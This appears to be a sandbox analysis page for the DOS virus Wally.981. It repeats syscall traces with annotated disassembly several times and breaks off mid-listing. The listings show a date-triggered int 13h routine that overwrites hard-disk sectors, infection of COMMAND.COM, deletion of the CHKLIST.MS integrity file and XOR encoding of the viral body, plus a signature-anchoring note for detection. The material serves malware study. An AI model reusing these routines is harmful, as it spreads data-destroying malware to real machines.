Sample viewer

vx.netlux.org/Virus.DOS.Wally.981


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:07:15.605833118Z 42 PC: 132d9 | Get date 0x132d9: cmp cx, 0x7ca
; Continuation of the listing that starts on the preceding trace row
; (0x132d9: cmp cx, 0x7ca), i.e. right after DOS "Get date" returns.
; DOS Get date (int 21h, AH=2Ah) returns CX = year, DH = month, DL = day.
; Date gate: year >= 0x7ca (1994) or month >= 6 branches to 0x13321, which is
; not listed here; any other date jumps straight to 0x1332a.
; 0x132e7..0x13307 is a BIOS int 13h sector-write loop against drive 0x80.
; It is not reachable by fall-through (the jmp at 0x132e4 is unconditional);
; the only branch to it shown on this page is `je 0x132e7` at 0x13328.
; NOTE(review): no int 0x13 activity appears among this run's trace rows, and
; whether the tracer records BIOS calls at all is not visible here, so do not
; read the trace as evidence that the disk-write path is inert.
0x132dd: jge 0x13321  ; signed test of the cmp on the previous row: year >= 1994
0x132df: cmp dh, 6  ; DH = month
0x132e2: jae 0x13321  ; month >= 6
0x132e4: jmp 0x1332a  ; otherwise bypass the disk-write block below
0x132e7: xor cx, cx  ; int 13h: CH = cylinder 0, CL = 0 (sector field)
0x132e9: mov dx, 0x80  ; DH = head 0, DL = 0x80 (first fixed disk)
0x132ec: mov ax, 0x311  ; AH = 03h write sectors, AL = 0x11 (17 sectors)
0x132ef: mov bx, 0xb000
0x132f2: mov es, bx  ; data buffer ES:BX = B000:B000
0x132f4: int 0x13  ; BIOS disk write: overwrites sectors on the fixed disk
0x132f6: jae 0x132fc  ; CF clear = call succeeded
0x132f8: xor ah, ah  ; AH = 00h: reset disk system after a failed write
0x132fa: int 0x13
0x132fc: inc dh  ; next head
0x132fe: cmp dh, 4
0x13301: jb 0x132ef  ; heads 0..3; re-enters after the mov ax, so AX holds whatever int 0x13 returned
0x13303: xor dh, dh  ; back to head 0
0x13305: inc ch  ; next cylinder
0x13307: cmp ch, 0x20  ; bound of 0x20 cylinders; the branch that uses it is cut off
2018-12-17T23:07:15.608530198Z 44 PC: 13325 | Get time 0x13325: cmp dh, 1
; Continuation of the listing that starts on the preceding trace row
; (0x13325: cmp dh, 1). That row is logged as a "Get time" return; DOS Get time
; (int 21h, AH=2Ch) returns CH = hour, CL = minute, DH = second, DL = 1/100 s,
; so the compare presumably tests the seconds field. The call itself
; (0x13321..0x13324) is not listed - confirm against the full disassembly.
0x13328: je 0x132e7  ; DH == 1: enter the int 13h disk-write block at 0x132e7
0x1332a: pop bx  ; BX = word pushed outside this listing
0x1332b: mov ah, 0x2c  ; DOS Get time
0x1332d: int 0x21
0x1332f: sub bx, 0x104  ; rebase BX by -0x104; BX is used as a pointer below
0x13333: mov word ptr [bx], cx  ; save CX (hour:minute) at [BX]
0x13335: mov word ptr [bx + 2], dx  ; save DX (second:hundredths) at [BX+2]
0x13338: mov al, dh  ; AL = seconds
0x1333a: mov dh, 0
0x1333c: mov ah, dh  ; AX = seconds, zero-extended for the 8-bit divide
0x1333e: mov dl, 2
0x13340: div dl  ; AL = seconds / 2, AH = seconds % 2
0x13342: cmp ah, 0
0x13345: jne 0x1334f  ; odd second
0x13347: mov byte ptr [0xff00], 0  ; even second: byte at DS:0xff00 = 0
0x1334c: jmp 0x13354
0x1334f: mov byte ptr [0xff00], 3  ; odd second: byte at DS:0xff00 = 3 (its later use is not visible here)
0x13354: mov ah, 0x19  ; DOS Get default drive
0x13356: int 0x21  ; returns AL = drive number (0 = A:)
2018-12-17T23:07:15.610731576Z 44 PC: 1332f | Get time 0x1332f: sub bx, 0x104
; Continuation of the listing that starts on the preceding trace row
; (0x1332f: sub bx, 0x104), right after DOS "Get time" returns.
; DOS Get time (int 21h, AH=2Ch) returns CH = hour, CL = minute,
; DH = second, DL = 1/100 s. Where BX came from is outside this listing.
; The code stores the time, derives a 0/3 flag from the parity of the seconds,
; then queries the default drive and prepares a Get current directory call.
0x13333: mov word ptr [bx], cx  ; save CX (hour:minute) at [BX]
0x13335: mov word ptr [bx + 2], dx  ; save DX (second:hundredths) at [BX+2]
0x13338: mov al, dh  ; AL = seconds
0x1333a: mov dh, 0
0x1333c: mov ah, dh  ; AX = seconds, zero-extended for the 8-bit divide
0x1333e: mov dl, 2
0x13340: div dl  ; AL = seconds / 2, AH = seconds % 2
0x13342: cmp ah, 0
0x13345: jne 0x1334f  ; odd second
0x13347: mov byte ptr [0xff00], 0  ; even second: byte at DS:0xff00 = 0
0x1334c: jmp 0x13354
0x1334f: mov byte ptr [0xff00], 3  ; odd second: byte at DS:0xff00 = 3 (its later use is not visible here)
0x13354: mov ah, 0x19  ; DOS Get default drive
0x13356: int 0x21  ; returns AL = drive number (0 = A:)
0x13358: mov byte ptr [0xffbc], al  ; keep the drive number at DS:0xffbc
0x1335b: mov ah, 0x47  ; DOS Get current directory
0x1335d: mov dh, 0
0x1335f: add al, 1  ; AH=47h takes a 1-based drive number in DL
0x13361: mov dl, al
2018-12-17T23:07:15.613730163Z 25 PC: 13358 | Get default drive
2018-12-17T23:07:15.615727938Z 71 PC: 13368 | Get current directory
2018-12-17T23:07:15.620137438Z 26 PC: 13374 | Set disk transfer address
2018-12-17T23:07:15.625641514Z 14 PC: 13380 | Set default drive (Drive = 'C')
2018-12-17T23:07:15.627610987Z 59 PC: 13391 | Change current directory
2018-12-17T23:07:15.632725922Z 78 PC: 133c5 | Find first file
2018-12-17T23:07:15.640575949Z 67 PC: 13448 | Get or set file attributes
2018-12-17T23:07:15.64675261Z 67 PC: 13454 | Get or set file attributes
2018-12-17T23:07:15.991946001Z 61 PC: 1345c | Open file (Filename = 'COMMAND.COM')
2018-12-17T23:07:16.002776972Z 66 PC: 13467 | Move file pointer
2018-12-17T23:07:16.005243108Z 66 PC: 13476 | Move file pointer
2018-12-17T23:07:16.008128041Z 63 PC: 13480 | Read file or device (Read 80 bytes on handle 5)
2018-12-17T23:07:16.017962669Z 65 PC: 1360d | Delete file (Filename = 'CHKLIST.MS')
2018-12-17T23:07:16.024410379Z 66 PC: 134ea | Move file pointer
2018-12-17T23:07:16.027494577Z 66 PC: 134fb | Move file pointer
2018-12-17T23:07:16.029659617Z 63 PC: 13505 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:07:16.032903064Z 66 PC: 1350e | Move file pointer
2018-12-17T23:07:16.034820799Z 64 PC: 1352d | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:07:16.039905297Z 66 PC: 13536 | Move file pointer
2018-12-17T23:07:16.044117746Z 44 PC: 13557 | Get time 0x13557: add dl, dh
; Continuation of the listing that starts on the preceding trace row
; (0x13557: add dl, dh), right after DOS "Get time" returns
; (CL = minute, DH = second, DL = 1/100 s).
; DL becomes a one-byte value mixed from the time fields and is used as a
; single-byte XOR key over ES:[0x57..]; the key is also stored at ES:0x3d1.
; The buffer (0x3d2 = 978 bytes) is then written to the open file handle.
; Detection note: the loop never touches offsets below 0x57, so the encoded
; part presumably differs between writes while that leading region stays
; constant - anchor byte signatures there and confirm against the written file.
0x13559: add dl, cl  ; DL = hundredths + seconds + minutes (mod 256)
0x1355b: mov bx, 0x3d1
0x1355e: mov byte ptr es:[bx], dl  ; store the key byte at ES:0x3d1
0x13561: mov di, 0x57  ; first offset to encode
0x13564: pop cx  ; CX = word pushed outside this listing
0x13565: sub cx, di
0x13567: sub cx, 0x104  ; loop count = popped value - 0x57 - 0x104
0x1356b: xor byte ptr es:[di], dl  ; single-byte XOR in place
0x1356e: inc di
0x1356f: loop 0x1356b
0x13571: mov ax, es
0x13573: mov ds, ax  ; DS = buffer segment for the write
0x13575: push cs
0x13576: pop es  ; ES = CS
0x13577: pop bx  ; BX = file handle (the trace row that follows reports handle 5)
0x13578: mov ah, 0x40  ; DOS Write file or device
0x1357a: mov cx, 0x3d2  ; byte count 0x3d2 = 978
0x1357d: xor dx, dx  ; source = DS:0000
0x1357f: int 0x21
2018-12-17T23:07:16.049740426Z 64 PC: 13581 | Write file or device (Write 978 bytes on handle 5)
2018-12-17T23:07:16.069883802Z 64 PC: 1358d | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:07:16.073479793Z 87 PC: 1359e | Get or set file date and time
2018-12-17T23:07:16.075568559Z 62 PC: 135a6 | Close file
2018-12-17T23:07:16.079394231Z 67 PC: 135b2 | Get or set file attributes
2018-12-17T23:07:16.091288039Z 65 PC: 1360d | Delete file (Filename = 'CHKLIST.MS')
2018-12-17T23:07:16.109786203Z 14 PC: 135c1 | Set default drive (Drive = 'A')
2018-12-17T23:07:16.112338902Z 59 PC: 135c8 | Change current directory
2018-12-17T23:07:16.117933869Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=00000834h/0000002100d bytes. ')
2018-12-17T23:07:16.124093318Z 48 PC: 12a8f | Get DOS version
2018-12-17T23:07:16.132000843Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-17T23:07:16.139968471Z 93 PC: 12afe | File sharing functions
2018-12-17T23:07:16.142272442Z 9 PC: 12a86 | Display string (String= 'Size change=03D5h/00981d. ')
2018-12-17T23:07:16.146707379Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15810,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:44:35.963261374Z 42 PC: 132d9 | Get date 0x132d9: cmp cx, 0x7ca
; Continuation of the listing that starts on the preceding trace row
; (0x132d9: cmp cx, 0x7ca), i.e. right after DOS "Get date" returns.
; DOS Get date (int 21h, AH=2Ah) returns CX = year, DH = month, DL = day.
; Date gate: year >= 0x7ca (1994) or month >= 6 branches to 0x13321, which is
; not listed here; any other date jumps straight to 0x1332a.
; 0x132e7..0x13307 is a BIOS int 13h sector-write loop against drive 0x80.
; It is not reachable by fall-through (the jmp at 0x132e4 is unconditional);
; the only branch to it shown on this page is `je 0x132e7` at 0x13328.
; NOTE(review): no int 0x13 activity appears among this run's trace rows, and
; whether the tracer records BIOS calls at all is not visible here, so do not
; read the trace as evidence that the disk-write path is inert.
0x132dd: jge 0x13321  ; signed test of the cmp on the previous row: year >= 1994
0x132df: cmp dh, 6  ; DH = month
0x132e2: jae 0x13321  ; month >= 6
0x132e4: jmp 0x1332a  ; otherwise bypass the disk-write block below
0x132e7: xor cx, cx  ; int 13h: CH = cylinder 0, CL = 0 (sector field)
0x132e9: mov dx, 0x80  ; DH = head 0, DL = 0x80 (first fixed disk)
0x132ec: mov ax, 0x311  ; AH = 03h write sectors, AL = 0x11 (17 sectors)
0x132ef: mov bx, 0xb000
0x132f2: mov es, bx  ; data buffer ES:BX = B000:B000
0x132f4: int 0x13  ; BIOS disk write: overwrites sectors on the fixed disk
0x132f6: jae 0x132fc  ; CF clear = call succeeded
0x132f8: xor ah, ah  ; AH = 00h: reset disk system after a failed write
0x132fa: int 0x13
0x132fc: inc dh  ; next head
0x132fe: cmp dh, 4
0x13301: jb 0x132ef  ; heads 0..3; re-enters after the mov ax, so AX holds whatever int 0x13 returned
0x13303: xor dh, dh  ; back to head 0
0x13305: inc ch  ; next cylinder
0x13307: cmp ch, 0x20  ; bound of 0x20 cylinders; the branch that uses it is cut off
2018-12-25T12:44:35.96647951Z 44 PC: 1332f | Get time 0x1332f: sub bx, 0x104
; Continuation of the listing that starts on the preceding trace row
; (0x1332f: sub bx, 0x104), right after DOS "Get time" returns.
; DOS Get time (int 21h, AH=2Ch) returns CH = hour, CL = minute,
; DH = second, DL = 1/100 s. Where BX came from is outside this listing.
; The code stores the time, derives a 0/3 flag from the parity of the seconds,
; then queries the default drive and prepares a Get current directory call.
0x13333: mov word ptr [bx], cx  ; save CX (hour:minute) at [BX]
0x13335: mov word ptr [bx + 2], dx  ; save DX (second:hundredths) at [BX+2]
0x13338: mov al, dh  ; AL = seconds
0x1333a: mov dh, 0
0x1333c: mov ah, dh  ; AX = seconds, zero-extended for the 8-bit divide
0x1333e: mov dl, 2
0x13340: div dl  ; AL = seconds / 2, AH = seconds % 2
0x13342: cmp ah, 0
0x13345: jne 0x1334f  ; odd second
0x13347: mov byte ptr [0xff00], 0  ; even second: byte at DS:0xff00 = 0
0x1334c: jmp 0x13354
0x1334f: mov byte ptr [0xff00], 3  ; odd second: byte at DS:0xff00 = 3 (its later use is not visible here)
0x13354: mov ah, 0x19  ; DOS Get default drive
0x13356: int 0x21  ; returns AL = drive number (0 = A:)
0x13358: mov byte ptr [0xffbc], al  ; keep the drive number at DS:0xffbc
0x1335b: mov ah, 0x47  ; DOS Get current directory
0x1335d: mov dh, 0
0x1335f: add al, 1  ; AH=47h takes a 1-based drive number in DL
0x13361: mov dl, al
2018-12-25T12:44:35.969400638Z 25 PC: 13358 | Get default drive
2018-12-25T12:44:35.97066533Z 71 PC: 13368 | Get current directory
2018-12-25T12:44:35.973866525Z 26 PC: 13374 | Set disk transfer address
2018-12-25T12:44:35.97499701Z 14 PC: 13380 | Set default drive (Drive = 'C')
2018-12-25T12:44:35.9761465Z 59 PC: 13391 | Change current directory
2018-12-25T12:44:35.979935885Z 78 PC: 133c5 | Find first file
2018-12-25T12:44:35.985667967Z 67 PC: 13448 | Get or set file attributes
2018-12-25T12:44:35.991081328Z 67 PC: 13454 | Get or set file attributes
2018-12-25T12:44:36.331659235Z 61 PC: 1345c | Open file (Filename = 'COMMAND.COM')
2018-12-25T12:44:36.337998096Z 66 PC: 13467 | Move file pointer
2018-12-25T12:44:36.339249683Z 66 PC: 13476 | Move file pointer
2018-12-25T12:44:36.340447981Z 63 PC: 13480 | Read file or device (Read 80 bytes on handle 5)
2018-12-25T12:44:36.346781038Z 65 PC: 1360d | Delete file (Filename = 'CHKLIST.MS')
2018-12-25T12:44:36.351970521Z 66 PC: 134ea | Move file pointer
2018-12-25T12:44:36.353166867Z 66 PC: 134fb | Move file pointer
2018-12-25T12:44:36.355313148Z 63 PC: 13505 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:44:36.35769938Z 66 PC: 1350e | Move file pointer
2018-12-25T12:44:36.358858988Z 64 PC: 1352d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:36.361995456Z 66 PC: 13536 | Move file pointer
2018-12-25T12:44:36.36322741Z 44 PC: 13557 | Get time 0x13557: add dl, dh
; Continuation of the listing that starts on the preceding trace row
; (0x13557: add dl, dh), right after DOS "Get time" returns
; (CL = minute, DH = second, DL = 1/100 s).
; DL becomes a one-byte value mixed from the time fields and is used as a
; single-byte XOR key over ES:[0x57..]; the key is also stored at ES:0x3d1.
; The buffer (0x3d2 = 978 bytes) is then written to the open file handle.
; Detection note: the loop never touches offsets below 0x57, so the encoded
; part presumably differs between writes while that leading region stays
; constant - anchor byte signatures there and confirm against the written file.
0x13559: add dl, cl  ; DL = hundredths + seconds + minutes (mod 256)
0x1355b: mov bx, 0x3d1
0x1355e: mov byte ptr es:[bx], dl  ; store the key byte at ES:0x3d1
0x13561: mov di, 0x57  ; first offset to encode
0x13564: pop cx  ; CX = word pushed outside this listing
0x13565: sub cx, di
0x13567: sub cx, 0x104  ; loop count = popped value - 0x57 - 0x104
0x1356b: xor byte ptr es:[di], dl  ; single-byte XOR in place
0x1356e: inc di
0x1356f: loop 0x1356b
0x13571: mov ax, es
0x13573: mov ds, ax  ; DS = buffer segment for the write
0x13575: push cs
0x13576: pop es  ; ES = CS
0x13577: pop bx  ; BX = file handle (the trace row that follows reports handle 5)
0x13578: mov ah, 0x40  ; DOS Write file or device
0x1357a: mov cx, 0x3d2  ; byte count 0x3d2 = 978
0x1357d: xor dx, dx  ; source = DS:0000
0x1357f: int 0x21
2018-12-25T12:44:36.365324481Z 64 PC: 13581 | Write file or device (Write 978 bytes on handle 5)
2018-12-25T12:44:36.376351008Z 64 PC: 1358d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:36.378953343Z 87 PC: 1359e | Get or set file date and time
2018-12-25T12:44:36.380304223Z 62 PC: 135a6 | Close file
2018-12-25T12:44:36.382417571Z 67 PC: 135b2 | Get or set file attributes
2018-12-25T12:44:36.392650839Z 65 PC: 1360d | Delete file (See above)
2018-12-25T12:44:36.398532829Z 14 PC: 135c1 | Set default drive (Drive = 'A')
2018-12-25T12:44:36.400270864Z 59 PC: 135c8 | Change current directory
2018-12-25T12:44:36.404063421Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=00000834h/0000002100d bytes. ')
2018-12-25T12:44:36.409298172Z 48 PC: 12a8f | Get DOS version
2018-12-25T12:44:36.41133727Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T12:44:36.425382494Z 93 PC: 12afe | File sharing functions
2018-12-25T12:44:36.427402839Z 9 PC: 12a86 | Display string (See above)
2018-12-25T12:44:36.431782596Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15810,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:44:36.575209924Z 42 PC: 132d9 | Get date 0x132d9: cmp cx, 0x7ca
; Continuation of the listing that starts on the preceding trace row
; (0x132d9: cmp cx, 0x7ca), i.e. right after DOS "Get date" returns.
; DOS Get date (int 21h, AH=2Ah) returns CX = year, DH = month, DL = day.
; Date gate: year >= 0x7ca (1994) or month >= 6 branches to 0x13321, which is
; not listed here; any other date jumps straight to 0x1332a.
; 0x132e7..0x13307 is a BIOS int 13h sector-write loop against drive 0x80.
; It is not reachable by fall-through (the jmp at 0x132e4 is unconditional);
; the only branch to it shown on this page is `je 0x132e7` at 0x13328.
; NOTE(review): no int 0x13 activity appears among this run's trace rows, and
; whether the tracer records BIOS calls at all is not visible here, so do not
; read the trace as evidence that the disk-write path is inert.
0x132dd: jge 0x13321  ; signed test of the cmp on the previous row: year >= 1994
0x132df: cmp dh, 6  ; DH = month
0x132e2: jae 0x13321  ; month >= 6
0x132e4: jmp 0x1332a  ; otherwise bypass the disk-write block below
0x132e7: xor cx, cx  ; int 13h: CH = cylinder 0, CL = 0 (sector field)
0x132e9: mov dx, 0x80  ; DH = head 0, DL = 0x80 (first fixed disk)
0x132ec: mov ax, 0x311  ; AH = 03h write sectors, AL = 0x11 (17 sectors)
0x132ef: mov bx, 0xb000
0x132f2: mov es, bx  ; data buffer ES:BX = B000:B000
0x132f4: int 0x13  ; BIOS disk write: overwrites sectors on the fixed disk
0x132f6: jae 0x132fc  ; CF clear = call succeeded
0x132f8: xor ah, ah  ; AH = 00h: reset disk system after a failed write
0x132fa: int 0x13
0x132fc: inc dh  ; next head
0x132fe: cmp dh, 4
0x13301: jb 0x132ef  ; heads 0..3; re-enters after the mov ax, so AX holds whatever int 0x13 returned
0x13303: xor dh, dh  ; back to head 0
0x13305: inc ch  ; next cylinder
0x13307: cmp ch, 0x20  ; bound of 0x20 cylinders; the branch that uses it is cut off
2018-12-25T12:44:36.578090272Z 44 PC: 1332f | Get time 0x1332f: sub bx, 0x104
; Continuation of the listing that starts on the preceding trace row
; (0x1332f: sub bx, 0x104), right after DOS "Get time" returns.
; DOS Get time (int 21h, AH=2Ch) returns CH = hour, CL = minute,
; DH = second, DL = 1/100 s. Where BX came from is outside this listing.
; The code stores the time, derives a 0/3 flag from the parity of the seconds,
; then queries the default drive and prepares a Get current directory call.
0x13333: mov word ptr [bx], cx  ; save CX (hour:minute) at [BX]
0x13335: mov word ptr [bx + 2], dx  ; save DX (second:hundredths) at [BX+2]
0x13338: mov al, dh  ; AL = seconds
0x1333a: mov dh, 0
0x1333c: mov ah, dh  ; AX = seconds, zero-extended for the 8-bit divide
0x1333e: mov dl, 2
0x13340: div dl  ; AL = seconds / 2, AH = seconds % 2
0x13342: cmp ah, 0
0x13345: jne 0x1334f  ; odd second
0x13347: mov byte ptr [0xff00], 0  ; even second: byte at DS:0xff00 = 0
0x1334c: jmp 0x13354
0x1334f: mov byte ptr [0xff00], 3  ; odd second: byte at DS:0xff00 = 3 (its later use is not visible here)
0x13354: mov ah, 0x19  ; DOS Get default drive
0x13356: int 0x21  ; returns AL = drive number (0 = A:)
0x13358: mov byte ptr [0xffbc], al  ; keep the drive number at DS:0xffbc
0x1335b: mov ah, 0x47  ; DOS Get current directory
0x1335d: mov dh, 0
0x1335f: add al, 1  ; AH=47h takes a 1-based drive number in DL
0x13361: mov dl, al
2018-12-25T12:44:36.580026964Z 25 PC: 13358 | Get default drive
2018-12-25T12:44:36.580929574Z 71 PC: 13368 | Get current directory
2018-12-25T12:44:36.584399791Z 26 PC: 13374 | Set disk transfer address
2018-12-25T12:44:36.58537672Z 14 PC: 13380 | Set default drive (Drive = 'C')
2018-12-25T12:44:36.586517662Z 59 PC: 13391 | Change current directory
2018-12-25T12:44:36.590842248Z 78 PC: 133c5 | Find first file
2018-12-25T12:44:36.59608585Z 67 PC: 13448 | Get or set file attributes
2018-12-25T12:44:36.60138695Z 67 PC: 13454 | Get or set file attributes
2018-12-25T12:44:37.585124486Z 61 PC: 1345c | Open file (Filename = 'COMMAND.COM')
2018-12-25T12:44:37.591632141Z 66 PC: 13467 | Move file pointer
2018-12-25T12:44:37.593347953Z 66 PC: 13476 | Move file pointer
2018-12-25T12:44:37.595839893Z 63 PC: 13480 | Read file or device (Read 80 bytes on handle 5)
2018-12-25T12:44:37.614576741Z 65 PC: 1360d | Delete file (Filename = 'CHKLIST.MS')
2018-12-25T12:44:37.620229719Z 66 PC: 134ea | Move file pointer
2018-12-25T12:44:37.621889174Z 66 PC: 134fb | Move file pointer
2018-12-25T12:44:37.624831824Z 63 PC: 13505 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:44:37.628841174Z 66 PC: 1350e | Move file pointer
2018-12-25T12:44:37.630307879Z 64 PC: 1352d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:37.633914952Z 66 PC: 13536 | Move file pointer
2018-12-25T12:44:37.635258484Z 44 PC: 13557 | Get time 0x13557: add dl, dh
; Continuation of the listing that starts on the preceding trace row
; (0x13557: add dl, dh), right after DOS "Get time" returns
; (CL = minute, DH = second, DL = 1/100 s).
; DL becomes a one-byte value mixed from the time fields and is used as a
; single-byte XOR key over ES:[0x57..]; the key is also stored at ES:0x3d1.
; The buffer (0x3d2 = 978 bytes) is then written to the open file handle.
; Detection note: the loop never touches offsets below 0x57, so the encoded
; part presumably differs between writes while that leading region stays
; constant - anchor byte signatures there and confirm against the written file.
0x13559: add dl, cl  ; DL = hundredths + seconds + minutes (mod 256)
0x1355b: mov bx, 0x3d1
0x1355e: mov byte ptr es:[bx], dl  ; store the key byte at ES:0x3d1
0x13561: mov di, 0x57  ; first offset to encode
0x13564: pop cx  ; CX = word pushed outside this listing
0x13565: sub cx, di
0x13567: sub cx, 0x104  ; loop count = popped value - 0x57 - 0x104
0x1356b: xor byte ptr es:[di], dl  ; single-byte XOR in place
0x1356e: inc di
0x1356f: loop 0x1356b
0x13571: mov ax, es
0x13573: mov ds, ax  ; DS = buffer segment for the write
0x13575: push cs
0x13576: pop es  ; ES = CS
0x13577: pop bx  ; BX = file handle (the trace row that follows reports handle 5)
0x13578: mov ah, 0x40  ; DOS Write file or device
0x1357a: mov cx, 0x3d2  ; byte count 0x3d2 = 978
0x1357d: xor dx, dx  ; source = DS:0000
0x1357f: int 0x21
2018-12-25T12:44:37.637395388Z 64 PC: 13581 | Write file or device (Write 978 bytes on handle 5)
2018-12-25T12:44:37.662423092Z 64 PC: 1358d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:37.677031498Z 87 PC: 1359e | Get or set file date and time
2018-12-25T12:44:37.678589824Z 62 PC: 135a6 | Close file
2018-12-25T12:44:37.681454319Z 67 PC: 135b2 | Get or set file attributes
2018-12-25T12:44:37.69165925Z 65 PC: 1360d | Delete file (See above)
2018-12-25T12:44:37.697373812Z 14 PC: 135c1 | Set default drive (Drive = 'A')
2018-12-25T12:44:37.702530368Z 59 PC: 135c8 | Change current directory
2018-12-25T12:44:37.70680966Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=00000834h/0000002100d bytes. ')
2018-12-25T12:44:37.715617041Z 48 PC: 12a8f | Get DOS version
2018-12-25T12:44:37.717227508Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T12:44:37.724926803Z 93 PC: 12afe | File sharing functions
2018-12-25T12:44:37.727839592Z 9 PC: 12a86 | Display string (See above)
2018-12-25T12:44:37.732992724Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":15810,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:44:36.791848022Z 42 PC: 132d9 | Get date 0x132d9: cmp cx, 0x7ca
; Continuation of the listing that starts on the preceding trace row
; (0x132d9: cmp cx, 0x7ca), i.e. right after DOS "Get date" returns.
; DOS Get date (int 21h, AH=2Ah) returns CX = year, DH = month, DL = day.
; Date gate: year >= 0x7ca (1994) or month >= 6 branches to 0x13321, which is
; not listed here; any other date jumps straight to 0x1332a.
; 0x132e7..0x13307 is a BIOS int 13h sector-write loop against drive 0x80.
; It is not reachable by fall-through (the jmp at 0x132e4 is unconditional);
; the only branch to it shown on this page is `je 0x132e7` at 0x13328.
; NOTE(review): no int 0x13 activity appears among this run's trace rows, and
; whether the tracer records BIOS calls at all is not visible here, so do not
; read the trace as evidence that the disk-write path is inert.
0x132dd: jge 0x13321  ; signed test of the cmp on the previous row: year >= 1994
0x132df: cmp dh, 6  ; DH = month
0x132e2: jae 0x13321  ; month >= 6
0x132e4: jmp 0x1332a  ; otherwise bypass the disk-write block below
0x132e7: xor cx, cx  ; int 13h: CH = cylinder 0, CL = 0 (sector field)
0x132e9: mov dx, 0x80  ; DH = head 0, DL = 0x80 (first fixed disk)
0x132ec: mov ax, 0x311  ; AH = 03h write sectors, AL = 0x11 (17 sectors)
0x132ef: mov bx, 0xb000
0x132f2: mov es, bx  ; data buffer ES:BX = B000:B000
0x132f4: int 0x13  ; BIOS disk write: overwrites sectors on the fixed disk
0x132f6: jae 0x132fc  ; CF clear = call succeeded
0x132f8: xor ah, ah  ; AH = 00h: reset disk system after a failed write
0x132fa: int 0x13
0x132fc: inc dh  ; next head
0x132fe: cmp dh, 4
0x13301: jb 0x132ef  ; heads 0..3; re-enters after the mov ax, so AX holds whatever int 0x13 returned
0x13303: xor dh, dh  ; back to head 0
0x13305: inc ch  ; next cylinder
0x13307: cmp ch, 0x20  ; bound of 0x20 cylinders; the branch that uses it is cut off
2018-12-25T12:44:36.795234579Z 44 PC: 1332f | Get time 0x1332f: sub bx, 0x104
; Continuation of the listing that starts on the preceding trace row
; (0x1332f: sub bx, 0x104), right after DOS "Get time" returns.
; DOS Get time (int 21h, AH=2Ch) returns CH = hour, CL = minute,
; DH = second, DL = 1/100 s. Where BX came from is outside this listing.
; The code stores the time, derives a 0/3 flag from the parity of the seconds,
; then queries the default drive and prepares a Get current directory call.
0x13333: mov word ptr [bx], cx  ; save CX (hour:minute) at [BX]
0x13335: mov word ptr [bx + 2], dx  ; save DX (second:hundredths) at [BX+2]
0x13338: mov al, dh  ; AL = seconds
0x1333a: mov dh, 0
0x1333c: mov ah, dh  ; AX = seconds, zero-extended for the 8-bit divide
0x1333e: mov dl, 2
0x13340: div dl  ; AL = seconds / 2, AH = seconds % 2
0x13342: cmp ah, 0
0x13345: jne 0x1334f  ; odd second
0x13347: mov byte ptr [0xff00], 0  ; even second: byte at DS:0xff00 = 0
0x1334c: jmp 0x13354
0x1334f: mov byte ptr [0xff00], 3  ; odd second: byte at DS:0xff00 = 3 (its later use is not visible here)
0x13354: mov ah, 0x19  ; DOS Get default drive
0x13356: int 0x21  ; returns AL = drive number (0 = A:)
0x13358: mov byte ptr [0xffbc], al  ; keep the drive number at DS:0xffbc
0x1335b: mov ah, 0x47  ; DOS Get current directory
0x1335d: mov dh, 0
0x1335f: add al, 1  ; AH=47h takes a 1-based drive number in DL
0x13361: mov dl, al
2018-12-25T12:44:36.797501394Z 25 PC: 13358 | Get default drive
2018-12-25T12:44:36.798872736Z 71 PC: 13368 | Get current directory
2018-12-25T12:44:36.802204006Z 26 PC: 13374 | Set disk transfer address
2018-12-25T12:44:36.803293028Z 14 PC: 13380 | Set default drive (Drive = 'C')
2018-12-25T12:44:36.804530648Z 59 PC: 13391 | Change current directory
2018-12-25T12:44:36.808286854Z 78 PC: 133c5 | Find first file
2018-12-25T12:44:36.813814148Z 67 PC: 13448 | Get or set file attributes
2018-12-25T12:44:36.819046783Z 67 PC: 13454 | Get or set file attributes
2018-12-25T12:44:37.580268979Z 61 PC: 1345c | Open file (Filename = 'COMMAND.COM')
2018-12-25T12:44:37.586093331Z 66 PC: 13467 | Move file pointer
2018-12-25T12:44:37.588172598Z 66 PC: 13476 | Move file pointer
2018-12-25T12:44:37.590140467Z 63 PC: 13480 | Read file or device (Read 80 bytes on handle 5)
2018-12-25T12:44:37.59820416Z 65 PC: 1360d | Delete file (Filename = 'CHKLIST.MS')
2018-12-25T12:44:37.604632556Z 66 PC: 134ea | Move file pointer
2018-12-25T12:44:37.606648076Z 66 PC: 134fb | Move file pointer
2018-12-25T12:44:37.615242035Z 63 PC: 13505 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:44:37.617799068Z 66 PC: 1350e | Move file pointer
2018-12-25T12:44:37.619096144Z 64 PC: 1352d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:37.622209486Z 66 PC: 13536 | Move file pointer
2018-12-25T12:44:37.623698355Z 44 PC: 13557 | Get time 0x13557: add dl, dh
; Continuation of the listing that starts on the preceding trace row
; (0x13557: add dl, dh), right after DOS "Get time" returns
